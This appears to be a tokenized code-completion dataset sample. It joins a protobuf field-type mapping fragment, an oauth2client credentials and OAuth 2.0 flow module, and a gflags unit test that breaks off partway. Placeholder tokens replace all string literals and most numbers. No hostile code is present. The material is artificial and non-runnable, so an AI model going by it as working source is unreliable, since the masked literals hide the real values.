Fixed32Decoder , <EOL> _FieldDescriptor . TYPE_BOOL : decoder . BoolDecoder , <EOL> _FieldDescriptor . TYPE_STRING : decoder . StringDecoder , <EOL> _FieldDescriptor . TYPE_GROUP : decoder . GroupDecoder , <EOL> _FieldDescriptor . TYPE_MESSAGE : decoder . MessageDecoder , <EOL> _FieldDescriptor . TYPE_BYTES : decoder . BytesDecoder , <EOL> _FieldDescriptor . TYPE_UINT32 : decoder . UInt32Decoder , <EOL> _FieldDescriptor . TYPE_ENUM : decoder . EnumDecoder , <EOL> _FieldDescriptor . TYPE_SFIXED32 : decoder . SFixed32Decoder , <EOL> _FieldDescriptor . TYPE_SFIXED64 : decoder . SFixed64Decoder , <EOL> _FieldDescriptor . TYPE_SINT32 : decoder . SInt32Decoder , <EOL> _FieldDescriptor . TYPE_SINT64 : decoder . SInt64Decoder , <EOL> } <EOL> FIELD_TYPE_TO_WIRE_TYPE = { <EOL> _FieldDescriptor . TYPE_DOUBLE : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . TYPE_FLOAT : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_INT64 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_UINT64 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_INT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_FIXED64 : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . TYPE_FIXED32 : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_BOOL : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_STRING : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_GROUP : wire_format . WIRETYPE_START_GROUP , <EOL> _FieldDescriptor . TYPE_MESSAGE : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_BYTES : <EOL> wire_format . WIRETYPE_LENGTH_DELIMITED , <EOL> _FieldDescriptor . TYPE_UINT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_ENUM : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_SFIXED32 : wire_format . WIRETYPE_FIXED32 , <EOL> _FieldDescriptor . TYPE_SFIXED64 : wire_format . WIRETYPE_FIXED64 , <EOL> _FieldDescriptor . 
TYPE_SINT32 : wire_format . WIRETYPE_VARINT , <EOL> _FieldDescriptor . TYPE_SINT64 : wire_format . WIRETYPE_VARINT , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import clientsecrets <EOL> import copy <EOL> import datetime <EOL> import httplib2 <EOL> import logging <EOL> import sys <EOL> import urllib <EOL> import urlparse <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson <EOL> except ImportError : <EOL> import json as simplejson <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPIRY_FORMAT = "<STR_LIT>" <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FlowExchangeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AccessTokenRefreshError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownClientSecretsFlowError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AccessTokenCredentialsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _abstract ( ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class Credentials ( object ) : <EOL> """<STR_LIT>""" <EOL> NON_SERIALIZED_MEMBERS = [ '<STR_LIT:store>' ] <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _to_json ( self , strip ) : <EOL> """<STR_LIT>""" <EOL> t = type ( self ) <EOL> d = copy . copy ( self . __dict__ ) <EOL> for member in strip : <EOL> del d [ member ] <EOL> if '<STR_LIT>' in d and isinstance ( d [ '<STR_LIT>' ] , datetime . datetime ) : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . strftime ( EXPIRY_FORMAT ) <EOL> d [ '<STR_LIT>' ] = t . __name__ <EOL> d [ '<STR_LIT>' ] = t . __module__ <EOL> return simplejson . dumps ( d ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def new_from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . 
loads ( s ) <EOL> module = data [ '<STR_LIT>' ] <EOL> m = __import__ ( module , fromlist = module . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> kls = getattr ( m , data [ '<STR_LIT>' ] ) <EOL> from_json = getattr ( kls , '<STR_LIT>' ) <EOL> return from_json ( s ) <EOL> class Flow ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Storage ( object ) : <EOL> """<STR_LIT>""" <EOL> def acquire_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def release_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_get ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> self . locked_put ( credentials ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> class OAuth2Credentials ( Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , client_id , client_secret , refresh_token , <EOL> token_expiry , token_uri , user_agent ) : <EOL> """<STR_LIT>""" <EOL> self . access_token = access_token <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . refresh_token = refresh_token <EOL> self . store = None <EOL> self . token_expiry = token_expiry <EOL> self . token_uri = token_uri <EOL> self . user_agent = user_agent <EOL> self . invalid = False <EOL> def to_json ( self ) : <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> if '<STR_LIT>' in data and not isinstance ( data [ '<STR_LIT>' ] , <EOL> datetime . datetime ) : <EOL> try : <EOL> data [ '<STR_LIT>' ] = datetime . datetime . 
strptime ( <EOL> data [ '<STR_LIT>' ] , EXPIRY_FORMAT ) <EOL> except : <EOL> data [ '<STR_LIT>' ] = None <EOL> retval = OAuth2Credentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> return retval <EOL> @ property <EOL> def access_token_expired ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . invalid : <EOL> return True <EOL> if not self . token_expiry : <EOL> return False <EOL> now = datetime . datetime . utcnow ( ) <EOL> if now >= self . token_expiry : <EOL> logger . info ( '<STR_LIT>' , <EOL> now , self . token_expiry ) <EOL> return True <EOL> return False <EOL> def set_store ( self , store ) : <EOL> """<STR_LIT>""" <EOL> self . store = store <EOL> def _updateFromCredential ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( other . __getstate__ ( ) ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = copy . copy ( self . __dict__ ) <EOL> del d [ '<STR_LIT:store>' ] <EOL> return d <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . store = None <EOL> def _generate_refresh_request_body ( self ) : <EOL> """<STR_LIT>""" <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT>' : self . refresh_token , <EOL> } ) <EOL> return body <EOL> def _generate_refresh_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> return headers <EOL> def _refresh ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> if not self . store : <EOL> self . _do_refresh_request ( http_request ) <EOL> else : <EOL> self . 
store . acquire_lock ( ) <EOL> try : <EOL> new_cred = self . store . locked_get ( ) <EOL> if ( new_cred and not new_cred . invalid and <EOL> new_cred . access_token != self . access_token ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _updateFromCredential ( new_cred ) <EOL> else : <EOL> self . _do_refresh_request ( http_request ) <EOL> finally : <EOL> self . store . release_lock ( ) <EOL> def _do_refresh_request ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> body = self . _generate_refresh_request_body ( ) <EOL> headers = self . _generate_refresh_request_headers ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> resp , content = http_request ( <EOL> self . token_uri , method = '<STR_LIT:POST>' , body = body , headers = headers ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> self . access_token = d [ '<STR_LIT>' ] <EOL> self . refresh_token = d . get ( '<STR_LIT>' , self . refresh_token ) <EOL> if '<STR_LIT>' in d : <EOL> self . token_expiry = datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) + datetime . datetime . utcnow ( ) <EOL> else : <EOL> self . token_expiry = None <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> self . invalid = True <EOL> if self . store : <EOL> self . store . locked_put ( self ) <EOL> except : <EOL> pass <EOL> raise AccessTokenRefreshError ( error_msg ) <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> request_orig = http . request <EOL> def new_request ( uri , method = '<STR_LIT:GET>' , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , <EOL> connection_type = None ) : <EOL> if not self . access_token : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . 
_refresh ( request_orig ) <EOL> if headers is None : <EOL> headers = { } <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> if self . user_agent is not None : <EOL> if '<STR_LIT>' in headers : <EOL> headers [ '<STR_LIT>' ] = self . user_agent + '<STR_LIT:U+0020>' + headers [ '<STR_LIT>' ] <EOL> else : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> resp , content = request_orig ( uri , method , body , headers , <EOL> redirections , connection_type ) <EOL> if resp . status == <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _refresh ( request_orig ) <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> return request_orig ( uri , method , body , headers , <EOL> redirections , connection_type ) <EOL> else : <EOL> return ( resp , content ) <EOL> http . request = new_request <EOL> return http <EOL> class AccessTokenCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , access_token , user_agent ) : <EOL> """<STR_LIT>""" <EOL> super ( AccessTokenCredentials , self ) . __init__ ( <EOL> access_token , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> user_agent ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> data = simplejson . loads ( s ) <EOL> retval = AccessTokenCredentials ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> return retval <EOL> def _refresh ( self , http_request ) : <EOL> raise AccessTokenCredentialsError ( <EOL> "<STR_LIT>" ) <EOL> class AssertionCredentials ( OAuth2Credentials ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , assertion_type , user_agent , <EOL> token_uri = '<STR_LIT>' , <EOL> ** unused_kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( AssertionCredentials , self ) . __init__ ( <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> None , <EOL> token_uri , <EOL> user_agent ) <EOL> self . assertion_type = assertion_type <EOL> def _generate_refresh_request_body ( self ) : <EOL> assertion = self . 
_generate_assertion ( ) <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : self . assertion_type , <EOL> '<STR_LIT>' : assertion , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return body <EOL> def _generate_assertion ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> class OAuth2WebServerFlow ( Flow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client_id , client_secret , scope , user_agent = None , <EOL> auth_uri = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> if type ( scope ) is list : <EOL> scope = '<STR_LIT:U+0020>' . join ( scope ) <EOL> self . scope = scope <EOL> self . user_agent = user_agent <EOL> self . auth_uri = auth_uri <EOL> self . token_uri = token_uri <EOL> self . params = kwargs <EOL> self . redirect_uri = None <EOL> def step1_get_authorize_url ( self , redirect_uri = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . redirect_uri = redirect_uri <EOL> query = { <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : redirect_uri , <EOL> '<STR_LIT>' : self . scope , <EOL> } <EOL> query . update ( self . params ) <EOL> parts = list ( urlparse . urlparse ( self . auth_uri ) ) <EOL> query . update ( dict ( parse_qsl ( parts [ <NUM_LIT:4> ] ) ) ) <EOL> parts [ <NUM_LIT:4> ] = urllib . urlencode ( query ) <EOL> return urlparse . urlunparse ( parts ) <EOL> def step2_exchange ( self , code , http = None ) : <EOL> """<STR_LIT>""" <EOL> if not ( isinstance ( code , str ) or isinstance ( code , unicode ) ) : <EOL> code = code [ '<STR_LIT:code>' ] <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT:code>' : code , <EOL> '<STR_LIT>' : self . redirect_uri , <EOL> '<STR_LIT>' : self . 
scope , <EOL> } ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> if http is None : <EOL> http = httplib2 . Http ( ) <EOL> resp , content = http . request ( self . token_uri , method = '<STR_LIT:POST>' , body = body , <EOL> headers = headers ) <EOL> if resp . status == <NUM_LIT:200> : <EOL> d = simplejson . loads ( content ) <EOL> access_token = d [ '<STR_LIT>' ] <EOL> refresh_token = d . get ( '<STR_LIT>' , None ) <EOL> token_expiry = None <EOL> if '<STR_LIT>' in d : <EOL> token_expiry = datetime . datetime . utcnow ( ) + datetime . timedelta ( <EOL> seconds = int ( d [ '<STR_LIT>' ] ) ) <EOL> logger . info ( '<STR_LIT>' % content ) <EOL> return OAuth2Credentials ( access_token , self . client_id , <EOL> self . client_secret , refresh_token , token_expiry , <EOL> self . token_uri , self . user_agent ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' % content ) <EOL> error_msg = '<STR_LIT>' % resp [ '<STR_LIT:status>' ] <EOL> try : <EOL> d = simplejson . loads ( content ) <EOL> if '<STR_LIT:error>' in d : <EOL> error_msg = d [ '<STR_LIT:error>' ] <EOL> except : <EOL> pass <EOL> raise FlowExchangeError ( error_msg ) <EOL> def flow_from_clientsecrets ( filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename ) <EOL> if client_type in [ clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ] : <EOL> return OAuth2WebServerFlow ( <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> scope , <EOL> None , <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> if message : <EOL> sys . exit ( message ) <EOL> else : <EOL> raise <EOL> else : <EOL> raise UnknownClientSecretsFlowError ( <EOL> '<STR_LIT>' * client_type ) </s>
<s> "<STR_LIT>" <EOL> __pychecker__ = "<STR_LIT>" <EOL> import sys <EOL> import os <EOL> import shutil <EOL> import gflags <EOL> from flags_modules_for_testing import module_foo <EOL> from flags_modules_for_testing import module_bar <EOL> from flags_modules_for_testing import module_baz <EOL> FLAGS = gflags . FLAGS <EOL> import gflags_googletest as googletest <EOL> class FlagsUnitTest ( googletest . TestCase ) : <EOL> "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> FLAGS . UseGnuGetOpt ( False ) <EOL> def test_flags ( self ) : <EOL> number_test_framework_flags = len ( FLAGS . RegisteredFlags ( ) ) <EOL> repeatHelp = "<STR_LIT>" <EOL> gflags . DEFINE_integer ( "<STR_LIT>" , <NUM_LIT:4> , repeatHelp , <EOL> lower_bound = <NUM_LIT:0> , short_name = '<STR_LIT:r>' ) <EOL> gflags . DEFINE_string ( "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT:q>" , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , <NUM_LIT:1> , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT:x>" , <NUM_LIT:3> , "<STR_LIT>" ) <EOL> gflags . DEFINE_integer ( "<STR_LIT:l>" , <NUM_LIT> L , "<STR_LIT>" ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" ) <EOL> gflags . DEFINE_list ( '<STR_LIT>' , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , "<STR_LIT>" ) <EOL> gflags . DEFINE_enum ( "<STR_LIT>" , None , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> "<STR_LIT:?>" ) <EOL> number_defined_flags = <NUM_LIT:11> + <NUM_LIT:1> <EOL> self . assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags + number_test_framework_flags ) <EOL> assert FLAGS . repeat == <NUM_LIT:4> , "<STR_LIT>" + FLAGS . repeat <EOL> assert FLAGS . name == '<STR_LIT>' , "<STR_LIT>" + FLAGS . name <EOL> assert FLAGS . 
debug == <NUM_LIT:0> , "<STR_LIT>" + FLAGS . debug <EOL> assert FLAGS . q == <NUM_LIT:1> , "<STR_LIT>" + FLAGS . q <EOL> assert FLAGS . x == <NUM_LIT:3> , "<STR_LIT>" + FLAGS . x <EOL> assert FLAGS . l == <NUM_LIT> L , ( "<STR_LIT>" <EOL> + FLAGS . l ) <EOL> assert FLAGS . letters == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] , ( "<STR_LIT>" <EOL> + FLAGS . letters ) <EOL> assert FLAGS . numbers == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , ( "<STR_LIT>" <EOL> + FLAGS . numbers ) <EOL> assert FLAGS . kwery is None , ( "<STR_LIT>" <EOL> + FLAGS . kwery ) <EOL> flag_values = FLAGS . FlagValuesDict ( ) <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:4> <EOL> assert flag_values [ '<STR_LIT:name>' ] == '<STR_LIT>' <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> assert flag_values [ '<STR_LIT:r>' ] == <NUM_LIT:4> <EOL> assert flag_values [ '<STR_LIT:q>' ] == <NUM_LIT:1> <EOL> assert flag_values [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> assert flag_values [ '<STR_LIT:x>' ] == <NUM_LIT:3> <EOL> assert flag_values [ '<STR_LIT:l>' ] == <NUM_LIT> L <EOL> assert flag_values [ '<STR_LIT>' ] == [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' ] <EOL> assert flag_values [ '<STR_LIT>' ] == [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert flag_values [ '<STR_LIT>' ] is None <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:name>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:q>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:x>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT:l>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . default_as_str == "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . 
default_as_str == "<STR_LIT>" <EOL> keys = list ( FLAGS ) <EOL> keys . sort ( ) <EOL> reg_flags = FLAGS . RegisteredFlags ( ) <EOL> reg_flags . sort ( ) <EOL> self . assertEqual ( keys , reg_flags ) <EOL> argv = ( '<STR_LIT>' , ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:name>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:name>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:q>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:q>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:x>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:x>' ] . present = <NUM_LIT:0> <EOL> self . assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags + number_test_framework_flags ) <EOL> assert '<STR_LIT:name>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:r>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:q>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:x>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT:l>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert '<STR_LIT>' in FLAGS . RegisteredFlags ( ) <EOL> assert FLAGS . has_key ( '<STR_LIT:name>' ) <EOL> assert not FLAGS . has_key ( '<STR_LIT>' ) <EOL> assert '<STR_LIT:name>' in FLAGS <EOL> assert '<STR_LIT>' not in FLAGS <EOL> del FLAGS . r <EOL> self . 
assertEqual ( len ( FLAGS . RegisteredFlags ( ) ) , <EOL> number_defined_flags - <NUM_LIT:1> + number_test_framework_flags ) <EOL> assert not '<STR_LIT:r>' in FLAGS . RegisteredFlags ( ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:2> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:1> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT>' ] . present = <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT:name>' ] . present == <NUM_LIT:1> <EOL> FLAGS [ '<STR_LIT:name>' ] . present = <NUM_LIT:0> <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> assert FLAGS [ '<STR_LIT>' ] . value <EOL> FLAGS . Reset ( ) <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:0> <EOL> assert not FLAGS [ '<STR_LIT>' ] . value <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert len ( argv ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> assert argv [ <NUM_LIT:0> ] == '<STR_LIT>' , "<STR_LIT>" <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:1> <EOL> assert FLAGS [ '<STR_LIT>' ] . value == '<STR_LIT>' <EOL> FLAGS . Reset ( ) <EOL> assert FLAGS [ '<STR_LIT>' ] . present == <NUM_LIT:0> <EOL> assert FLAGS [ '<STR_LIT>' ] . value == None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . 
x ) , long ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> self . assertEquals ( FLAGS . x , <NUM_LIT> ) <EOL> self . assertEquals ( type ( FLAGS . x ) , int ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> argv = FLAGS ( argv ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> except gflags . IllegalFlagValue : <EOL> pass <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> gflags . DEFINE_boolean ( "<STR_LIT>" , None , "<STR_LIT>" ) <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . test0 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> FLAGS . test1 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . test0 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test0 == <NUM_LIT:0> <EOL> FLAGS . test1 = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . test1 == <NUM_LIT:1> <EOL> FLAGS . noexec = None <EOL> argv = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> argv = FLAGS ( argv ) <EOL> assert FLAGS . noexec == <NUM_LIT:0> 